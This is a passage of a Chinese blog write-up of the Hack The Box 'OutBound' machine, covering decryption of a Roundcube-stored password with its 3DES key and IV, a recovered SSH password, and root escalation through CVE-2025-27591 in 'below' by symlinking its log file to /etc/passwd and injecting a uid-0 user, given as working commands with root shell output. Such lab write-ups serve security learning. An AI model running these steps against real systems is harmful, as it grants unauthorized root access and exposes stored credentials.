<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs php">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">get_crypto_method</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">get</span>(<span class="hljs-string">&#x27;cipher_method&#x27;</span>) ?: <span class="hljs-string">&#x27;DES-EDE3-CBC&#x27;</span>;<br>    &#125;<br><br>* @param <span class="hljs-keyword">string</span> <span class="hljs-variable">$cipher</span> Encrypted text<br>     * @param <span class="hljs-keyword">string</span> <span class="hljs-variable">$key</span>    Encryption key to retrieve <span class="hljs-keyword">from</span> the configuration, defaults to <span class="hljs-string">&#x27;des_key&#x27;</span><br>     * @param <span class="hljs-keyword">bool</span>   <span class="hljs-variable">$base64</span> Whether <span class="hljs-keyword">or</span> not input is base64-encoded<br>     *<br>     * @<span class="hljs-keyword">return</span> <span class="hljs-keyword">string</span>|<span class="hljs-literal">false</span> Decrypted text, <span class="hljs-literal">false</span> on error<br>     */<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">decrypt</span>(<span class="hljs-params"><span class="hljs-variable">$cipher</span>, <span class="hljs-variable">$key</span> = <span class="hljs-string">&#x27;des_key&#x27;</span>, <span class="hljs-variable">$base64</span> = <span class="hljs-literal">true</span></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-comment">// @phpstan-ignore-next-line</span><br>        <span class="hljs-keyword">if</span> (!<span class="hljs-title function_ invoke__">is_string</span>(<span class="hljs-variable">$cipher</span>) || !<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$cipher</span>)) &#123;<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>        &#125;<br><br>        <span class="hljs-keyword">if</span> (<span class="hljs-variable">$base64</span>) &#123;<br>            <span class="hljs-variable">$cipher</span> = <span class="hljs-title function_ invoke__">base64_decode</span>(<span class="hljs-variable">$cipher</span>, <span class="hljs-literal">true</span>);<br>            <span class="hljs-keyword">if</span> (<span class="hljs-variable">$cipher</span> === <span class="hljs-literal">false</span>) &#123;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>            &#125;<br>        &#125;<br><br>        <span class="hljs-variable">$ckey</span> = <span class="hljs-variable language_">$this</span>-&gt;config-&gt;<span class="hljs-title function_ invoke__">get_crypto_key</span>(<span class="hljs-variable">$key</span>);<br>        <span class="hljs-variable">$method</span> = <span class="hljs-variable language_">$this</span>-&gt;config-&gt;<span class="hljs-title function_ invoke__">get_crypto_method</span>();<br>        <span class="hljs-variable">$iv_size</span> = <span class="hljs-title function_ invoke__">openssl_cipher_iv_length</span>(<span class="hljs-variable">$method</span>);<br>        <span class="hljs-variable">$tag</span> = <span class="hljs-literal">null</span>;<br><br>        <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/^##(.&#123;16&#125;)##/s&#x27;</span>, <span class="hljs-variable">$cipher</span>, <span class="hljs-variable">$matches</span>)) &#123;<br>            <span class="hljs-variable">$tag</span> = <span class="hljs-variable">$matches</span>[<span class="hljs-number">1</span>];<br>            <span class="hljs-variable">$cipher</span> = <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$cipher</span>, <span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$matches</span>[<span class="hljs-number">0</span>]));<br>        &#125;<br><br>        <span class="hljs-variable">$iv</span> = <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$cipher</span>, <span class="hljs-number">0</span>, <span class="hljs-variable">$iv_size</span>);<br><br>        <span class="hljs-comment">// session corruption? (#1485970)</span><br>        <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$iv</span>) &lt; <span class="hljs-variable">$iv_size</span>) &#123;<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>        &#125;<br><br>        <span class="hljs-variable">$cipher</span> = <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$cipher</span>, <span class="hljs-variable">$iv_size</span>);<br>        <span class="hljs-variable">$clear</span> = <span class="hljs-title function_ invoke__">openssl_decrypt</span>(<span class="hljs-variable">$cipher</span>, <span class="hljs-variable">$method</span>, <span class="hljs-variable">$ckey</span>, \OPENSSL_RAW_DATA, <span class="hljs-variable">$iv</span>, <span class="hljs-variable">$tag</span>);<br><br>        <span class="hljs-keyword">return</span> <span class="hljs-variable">$clear</span>;<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>从上面的这些代码中可以得到加密方法为 DES-EDE3-CBC，也就是 3DES，iv 由密文经过 base64 解密然后再转为 hex 取前 8 个字节得到</p>
<p>最后结果为</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">iv</span>：<span class="hljs-number">2</span>fb46fd3403c4eec<br></code></pre></td></tr></table></figure>

<p>des_key 在之前的文件中有</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;des_key&#x27;</span>] = <span class="hljs-string">&#x27;rcmail-!24ByteDESkey*Str&#x27;</span>;<br></code></pre></td></tr></table></figure>

<img src="https://img.dkdun.cn/v1/2025/12/f6f1aa25c48d67ff.png" alt="image-20250716023136342" style="zoom: 50%;" />

<h1 id="ssh-登录"><a href="#ssh-登录" class="headerlink" title="ssh 登录"></a>ssh 登录</h1><p>登录 jacob 的账号，里面有邮件，拿到新密码 <code>gY4Wr3a1evp4</code></p>
<p><img src="https://img.dkdun.cn/v1/2025/12/fd9d7ff2b1dcb30c.png" alt="image-20250716011336662"></p>
<p>拿到 userflag</p>
<h1 id="CVE-2025-27591-利用-below-提权"><a href="#CVE-2025-27591-利用-below-提权" class="headerlink" title="CVE-2025-27591 利用 below 提权"></a>CVE-2025-27591 利用 below 提权</h1><p>sudo -l 发现有 below 权限</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash">jacob@outbound:~$ <span class="hljs-built_in">sudo</span> -l<br>Matching Defaults entries <span class="hljs-keyword">for</span> jacob on outbound:<br>    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty<br><br>User jacob may run the following commands on outbound:<br>    (ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*<br></code></pre></td></tr></table></figure>

<p>直接搜 below 提权找到 CVE，Below：&#x2F;var&#x2F;log&#x2F;below 全局可写目录导致本地提权漏洞 (CVE-2025-27591)</p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs applescript">此漏洞允许本地用户通过以下方式将权限提升到 root：<br><br><span class="hljs-number">1.</span> 符号链接 /var/<span class="hljs-built_in">log</span>/<span class="hljs-keyword">below</span>/error_root.<span class="hljs-built_in">log</span> 到 /etc/passwd<br><span class="hljs-number">2.</span> 触发 <span class="hljs-keyword">below</span> 写入符号链接<br><span class="hljs-number">3.</span> 将恶意 root 用户注入 /etc/passwd<br></code></pre></td></tr></table></figure>

<p>加密密码写入 &#x2F;etc&#x2F;passwd</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">└─# perl -e <span class="hljs-string">&#x27;print crypt(&quot;butt3rf1y&quot;,&quot;abc&quot;)&#x27;</span><br>abvS2XoFvLJII<br></code></pre></td></tr></table></figure>

<p>执行下面的命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">&#x27;butt3rf1y:abvS2XoFvLJII:0:0:,,,:/root:/bin/bash&#x27;</span> &gt; butt3rf1y<br><span class="hljs-built_in">rm</span> error_root.log <br><span class="hljs-built_in">ln</span> -s /etc/passwd /var/log/below/error_root.log<br><span class="hljs-built_in">sudo</span> /usr/bin/below<br><span class="hljs-built_in">cp</span> butt3rf1y error_root.log<br>su butt3rf1y<br></code></pre></td></tr></table></figure>

<p><img src="https://img.dkdun.cn/v1/2025/12/c780e77c3c20166a.png" alt="image-20250716020553047"></p>
<p>拿到 root 权限</p>
<p>后面 <a target="_blank" rel="noopener" href="https://www.n0o0b.com/">n0o0b</a> 师傅跟我说只需要三行命令就能拿到 root</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">rm</span> error_root.log<br><span class="hljs-built_in">ln</span> -s /etc/passwd error_root.log<br><span class="hljs-built_in">sudo</span> below<br><span class="hljs-built_in">echo</span> <span class="hljs-string">&#x27;butt3rf1y:abvS2XoFvLJII:0:0::/root:/bin/bash&#x27;</span> &gt; /etc/passwd<br>su butt3rf1y<br></code></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">jacob@outbound:/var/log/below$ <span class="hljs-built_in">echo</span> <span class="hljs-string">&#x27;butt3rf1y:abvS2XoFvLJII:0:0::/root:/bin/bash&#x27;</span> &gt; /etc/passwd<br>jacob@outbound:/var/log/below$ su butt3rf1y<br>Password:<br>butt3rf1y@outbound:/var/log/below# <span class="hljs-built_in">id</span><br>uid=0(root) gid=0(root) <span class="hljs-built_in">groups</span>=0(root)<br></code></pre></td></tr></table></figure>

<p>直接链接覆盖权限，把 &#x2F;etc&#x2F;passwd 的权限覆盖了写入用户，这样确实更简单一点，又学到了</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%B8%97%E9%80%8F/" class="category-chain-item">渗透</a>
  
  
    <span>></span>
    
  <a href="/categories/%E6%B8%97%E9%80%8F/%E9%9D%B6%E6%9C%BA/" class="category-chain-item">靶机</a>
  
  
    <span>></span>
    
  <a href="/categories/%E6%B8%97%E9%80%8F/%E9%9D%B6%E6%9C%BA/HTB/" class="category-chain-item">HTB</a>
  
  

  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/below-%E6%8F%90%E6%9D%83-CVE-2025-49113%E3%80%81CVE-2025-27591/" class="print-no-link">#below 提权 CVE-2025-49113、CVE-2025-27591</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>HTB-OutBound</div>
      <div>http://example.com/2025/07/17/HTB-OutBound/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>butt3rf1y</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年7月17日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/07/17/%E7%AC%AC%E4%B8%80%E5%B1%8AOpenHarmony-CTF%E4%B8%93%E9%A2%98%E8%B5%9B/" title="第一届OpenHarmony CTF专题赛">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">第一届OpenHarmony CTF专题赛</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/07/12/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-CVE-RCE/" title="春秋云镜:CVE-2024-36104">
                        <span class="hidden-mobile">春秋云镜:CVE-2024-36104</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments">
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"rWKtzRd76Kz6dC7Vd9dUwQux-gzGzoHsz","appKey":"DxMgc7gveh6B1aJKyAZnoFNj","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":true,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span> </a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> <div style="font-size: 0.85rem"> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>







  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  
<script src="/js/snow.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>

<!--浏览器搞笑标题-->
<script type="text/javascript" src="\js\FunnyTitle.js"></script>
<script type="text/javascript" src="\js\snow.js"></script>
<script type="text/javascript" src="\js\backgroundize.js"></script>

